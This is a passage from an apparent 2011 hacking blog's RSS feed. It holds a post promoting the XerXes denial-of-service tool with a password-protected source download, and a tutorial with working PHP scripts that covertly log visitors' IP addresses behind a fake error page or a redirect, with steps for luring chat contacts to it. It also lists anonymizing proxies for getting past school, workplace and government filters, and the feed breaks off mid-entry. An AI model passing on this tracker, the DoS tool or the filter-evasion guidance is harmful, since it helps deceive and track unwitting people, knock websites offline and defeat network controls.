&lt;span style="font-size: large;"&gt;*&lt;/span&gt; &lt;a href="http://www.theserials.com/"&gt;www.theserials.com&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHYKYuzWaRrkLXOk7-ILCUUX2Mvna7pCXzEqgb_V_PcVc_RjJgZz7obZt2H6S8l8_-IHikzRRFJaU714UjVw9d36CXEzYF8e4_9rqXa2wsPneJ9OACBsVz5QXObg7_SX8Mh1K4SvnymBV/s72-c/google-hacks.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Powerful Dos Tool XerXes | th3j35t3r's DOS tool</title><link>http://hackrich.blogspot.com/2011/10/powerful-dos-tool-xerxes-th3j35t3rs-dos.html</link><category>DOS</category><category>Hack a Website</category><category>th3j35t3r's DOS tool</category><category>tools</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 29 Oct 2011 13:33:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-8943803674944489270</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZAWw9S0uhM89-lrvcVfqIDfNrq6i-wC2WfWPrOwrkn9lpmoZCc2g84lYx-H-lgftKgNbEUOIrARMeb8vN_YYIK90oKI6dNGtBD_J5nMn-gssXVGumPsrkD9mlRUQnQc7XvORY3wlgYbjc/s1600/XerXes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZAWw9S0uhM89-lrvcVfqIDfNrq6i-wC2WfWPrOwrkn9lpmoZCc2g84lYx-H-lgftKgNbEUOIrARMeb8vN_YYIK90oKI6dNGtBD_J5nMn-gssXVGumPsrkD9mlRUQnQc7XvORY3wlgYbjc/s1600/XerXes.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #351c75;"&gt;&lt;span style="color: #38761d;"&gt;XerXes&lt;/span&gt; is one of the most powerful private dos tools. &lt;br /&gt;
This tool was used by "&lt;span style="color: #38761d;"&gt;th3j35t3r&lt;/span&gt;" to Hit WikiLeaks Site DoS Attack.&lt;br /&gt;
The "&lt;span style="color: #38761d;"&gt;Jester&lt;/span&gt;" claims the XerXeS attack can successfully disable most of websites.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000;"&gt;Source Code:&lt;/span&gt;&lt;/b&gt;&amp;nbsp; &lt;a href="http://www.4shared.com/file/AgYMXNEV/XerXes_Dos_Attack.html"&gt;DOWNLOAD&lt;/a&gt; &lt;b style="color: #660000;"&gt;( Password Protected )&amp;nbsp; &lt;/b&gt;&lt;br /&gt;
&lt;b style="color: #990000;"&gt;Password: &lt;/b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;&lt;span style="color: #38761d;"&gt;HACKRICH.BLOGSPOT.COM&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZAWw9S0uhM89-lrvcVfqIDfNrq6i-wC2WfWPrOwrkn9lpmoZCc2g84lYx-H-lgftKgNbEUOIrARMeb8vN_YYIK90oKI6dNGtBD_J5nMn-gssXVGumPsrkD9mlRUQnQc7XvORY3wlgYbjc/s72-c/XerXes.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Create own  IP Catcher/tracer</title><link>http://hackrich.blogspot.com/2011/10/create-own-ip-catchertracer.html</link><category>Hacking Tutorials</category><category>ip catcher</category><category>ip tracker</category><category>php</category><category>php hack</category><category>Steal/trace ip</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 29 Oct 2011 12:55:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-9090932089424370796</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJCbj6_zVSstux944JrLu2dRVW9n8Crq6LJq2tfFhcyIyGfVACyvg_PKAsFxzG7e_GQoplh8TzCAlEWNIztvQfzZoForrt9bs_z5fUAWzUmYa66uac0y3_Bjq9HZO-xBT7qS0sLB48IfdY/s1600/ips.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJCbj6_zVSstux944JrLu2dRVW9n8Crq6LJq2tfFhcyIyGfVACyvg_PKAsFxzG7e_GQoplh8TzCAlEWNIztvQfzZoForrt9bs_z5fUAWzUmYa66uac0y3_Bjq9HZO-xBT7qS0sLB48IfdY/s1600/ips.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: #351c75;"&gt;Many People are very curious to know the ip of the friend we are chatting using Google talk, Yahoo, Facebook though they don't know how to use it in a good or a bad way. I will In this article show you how to steal/trace ip using a &lt;b&gt;PHP script&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE:&lt;/b&gt; This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk. :)&lt;br /&gt;
&lt;br /&gt;
check live example here &lt;span style="font-size: large;"&gt;&lt;a href="http://hackrich.blogspot.com/p/click-here-to-join-ethical-hacking.html"&gt;live ip log &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How to steal/trace a Ip adress?? &lt;/b&gt;&lt;br /&gt;
Register a Free hosting at &lt;b&gt;110mb&lt;/b&gt; or &lt;b&gt;byethost&lt;/b&gt; and follow the steps.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;CODE 1:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: #38761d;"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;?php&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; $file = "ips.txt";&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; $f=fopen($file, 'a');&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; fwrite($f,$_SERVER['REMOTE_ADDR']."\n");&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; fclose($f);&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ?&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;p&amp;gt;Error! Try again &amp;lt;/p&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;/body&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Save it as xxx.php&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000; font-size: large;"&gt;CODE 2:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d; font-size: small;"&gt;&amp;lt;?php&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;
$dt = date("l dS \of F Y h:i:s A");&lt;br /&gt;
$file=fopen("ips.txt","a");&amp;nbsp; //ips.txt = Where it needs to save to. Here it must be hosted in same map !&lt;br /&gt;
$data = $ip.' '.$dt."\n";&lt;br /&gt;
fwrite($file, $data);&lt;br /&gt;
fclose($file);&lt;br /&gt;
header( 'Location: http://www.hackrich.blogspot.com' ) ; //www.hackrich.blogspot.com = Site where it needs to redirected to&lt;br /&gt;
?&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Save it as xxx.php&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2KG_aexb_HU-pTxv2L6aTKfI18EjcGu9SxHOppVpP3HYOr5RajQaqFRiDZ3fnkLYyYlAQswPNe9NjXKx-7eU2GPuOpFDDA829e7zuOXqFRZJ_Vem-CWvF4Jlb85Qgstr4KQQDqyRnStF0/s1600/IP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2KG_aexb_HU-pTxv2L6aTKfI18EjcGu9SxHOppVpP3HYOr5RajQaqFRiDZ3fnkLYyYlAQswPNe9NjXKx-7eU2GPuOpFDDA829e7zuOXqFRZJ_Vem-CWvF4Jlb85Qgstr4KQQDqyRnStF0/s400/IP.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;1.)&lt;/b&gt;&lt;/span&gt; First of all you need to make a new .txt document on the website you're uploading this to. Name it ips.txt (You can change that in the script. Where it says $file = 'ips.txt'; in the second line)(which i have done already) . Then change the CHMOD to 777.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;2.) &lt;/b&gt;&lt;/span&gt;Now you need to paste the script above in to a xxx.php document, and upload it. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;3.)&lt;/b&gt;&lt;/span&gt; Now you make people visit your site, and they will see only "Error! Try again" ! (for code 1)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;4.) &lt;/b&gt;&lt;/span&gt;To view the IP, you simply add "/ips.txt" after your domain, and you'll see the IP.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Share it give a like :)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJCbj6_zVSstux944JrLu2dRVW9n8Crq6LJq2tfFhcyIyGfVACyvg_PKAsFxzG7e_GQoplh8TzCAlEWNIztvQfzZoForrt9bs_z5fUAWzUmYa66uac0y3_Bjq9HZO-xBT7qS0sLB48IfdY/s72-c/ips.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>proxy servers</title><link>http://hackrich.blogspot.com/2011/10/proxy-servers.html</link><category>bypass web-filters</category><category>List of best anonymizers</category><category>list of proxy servers</category><category>Uses of proxy server</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sun, 23 Oct 2011 10:47:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-79570719535855288</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2e9jeYUpSKVLhauKRqWP-ppviY0fqNhdrCOhqH2XpQjztpDm62LRsgzJijsDhHc2A08La7d7ZMGZz2j4MRxMww4Ha4zOn38dfUYrrzlmRJ3uGJXhoKU4xS6ay8QUQ4cNzGAl1r1aausDE/s1600/proxy-server.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="289" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2e9jeYUpSKVLhauKRqWP-ppviY0fqNhdrCOhqH2XpQjztpDm62LRsgzJijsDhHc2A08La7d7ZMGZz2j4MRxMww4Ha4zOn38dfUYrrzlmRJ3uGJXhoKU4xS6ay8QUQ4cNzGAl1r1aausDE/s320/proxy-server.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: #351c75;"&gt;* In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server. In this case, it 'caches' responses from the remote server, and returns subsequent requests for the same content directly.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;The proxy concept was invented in the early days of distributed systems as a way to simplify and control their complexity. Today, most proxies are a web proxy, allowing access to content on the World Wide Web.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Uses&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;A proxy server has a large variety of potential purposes, including:&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To keep machines behind it anonymous, mainly for security.[2]&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.[3]&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To apply access policy to network services or content, e.g. to block undesired sites.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To access sites prohibited or filtered by your ISP or institution.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To log / audit usage, i.e. to provide company employee Internet usage reporting.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To bypass security / parental controls.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To circumvent Internet filtering to access content otherwise blocked by governments.[4]&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To scan transmitted content for malware before delivery.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To scan outbound content, e.g., for data leak protection.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #20124d;"&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; To allow a web site to make web requests to externally hosted resources (e.g. images, music files, etc.) when cross-domain restrictions prohibit the web site from linking directly to the outside domains.&lt;/span&gt; &lt;b style="color: #20124d;"&gt;*&lt;/b&gt;&lt;/span&gt;&lt;b style="color: #20124d;"&gt; source wikipedia *&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #990000;"&gt;So here is the &lt;span style="font-size: large;"&gt;List of best anonymizers&lt;/span&gt; and&lt;span style="font-size: large;"&gt; proxy servers&lt;/span&gt; &amp;amp; bypass web-filters !&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;ShadowBrowser – anonymously surf the internet and protect your Internet history at the same time. No software to download and supports SSL websites.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.proxyking.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyking.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Anonymouse – a very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://anonymouse.ws/"&gt;&lt;span style="color: #351c75;"&gt;http://anonymouse.ws&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;AnonymousIndex.com – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.hidemyass.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.hidemyass.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://proxy7.com/"&gt;Proxy7.com&lt;/a&gt; – Free webbased proxy. By using this proxy you can surf the Internet securely and safely. This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy-chains):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.anonymousindex.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.anonymousindex.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.hidemyass.com/"&gt;www.HideMyAss.com&lt;/a&gt; – Free anonymous browsing, for the times when you REALLY need to hide your ass online!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxyfoxy.com%20/"&gt;www.ProxyFoxy.com &lt;/a&gt;– Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.proxyfoxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyfoxy.com/&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;78Y.NET – It is a web anonymous web proxy designed to bypass proxy restrictions through a web interface. If, for example, in your university, college, job, etc, the IT department blocks a lot of harmless websites simply because of their popularity, so you can use 78Y.NET proxy service to access those websites.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (to create proxy chains):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.78y.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.78y.net/&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;www.75i.net - 75I.NET is anonymous CGI Proxy that allows anyone to surf the Internet privately and securely without any restrictions. 75I.NET anonymous web surfing proxy service is free.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (to create chains of proxies):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.75i.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.75i.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.dzzt.com/"&gt;www.dzzt.com&lt;/a&gt; – This anonymizer always hides your IP address, so all sites will not be able to uniquely your identify or track you. You’re able to access from your school, college, university, etc, the websites, which are restricted by your IT department.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.dzzt.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.dzzt.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Proxy Guy – The Proxy Guy offers free anonymous surfing. Now you can surf safe and secure with the click of a button.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.proxyguy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyguy.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.gamesproxy.com/"&gt;www.GamesProxy.com&lt;/a&gt; – Games Proxy helps you to play all your favourite flash games free online by using fast secure web proxy. Apart from playing free flash games you can also use Games Proxy to browse all your favourite sites such as ebay, hotmail &amp;amp; more!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxyz.be/"&gt;www.proxyz.be&lt;/a&gt; – It is a free internet service which allows you to surf anonymously and it “changes” your ip. You can also use it to access/bypass blocked websites on your school or office.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.proxyz.be/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyz.be&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.antifw.tk/"&gt;www.antifw.tk&lt;/a&gt; – Anti-firewall redirector. It allows to hide your IP and a name and a type of the file you gets from internet. Now corporate internet firewall will not be able to determine your internet activity.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxyhero.com/"&gt;www.ProxyHero.com&lt;/a&gt; – Fast and Secure US Proxy. PHP Based, and very easy to use. Completely free, and will keep you anonymous while browsing the internet.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyhero.com&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxydrop.com/"&gt;www.ProxyDrop.com&lt;/a&gt; – This is a free CGI proxy with HTTPS support. This service also includes the usual features including removing client side scripting, showing text only and enabling or disabling cookies. It also supports rotate13 or base64 URL encoding. Mirror1 Mirror2 Mirror3 Mirror4&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.proxydrop.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxydrop.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxydrop.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxydrop.net&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxydrop.biz/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxydrop.biz&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxydrop.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxydrop.info&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxydrop.org/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxydrop.org&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.prx1.com/"&gt;www.prx1.com&lt;/a&gt; – This is a free, safe, anonymous web proxy with configurable options. Browsing anonymously with prx1.com increases your security and lets you access web sites from behind a firewall.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chains):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.prx1.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.prx1.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.ninjaproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;www.ninjaproxy.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;It is a free anonymous web based proxy service. With Ninja Proxy you can browse your favorite web sites anonymously and even from behind a firewall with blocked ports.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chains):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.ninjaproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.ninjaproxy.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;ShadowSurf free anonymous proxy – Surf privately and 100% anonymously with ShadowSurf’s FREE web proxy. You can access blocked sites while keeping your IP secret. No software needed.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.shadowsurf.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.shadowsurf.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Famous5.net Proxy – Free browser based anonymizer without any 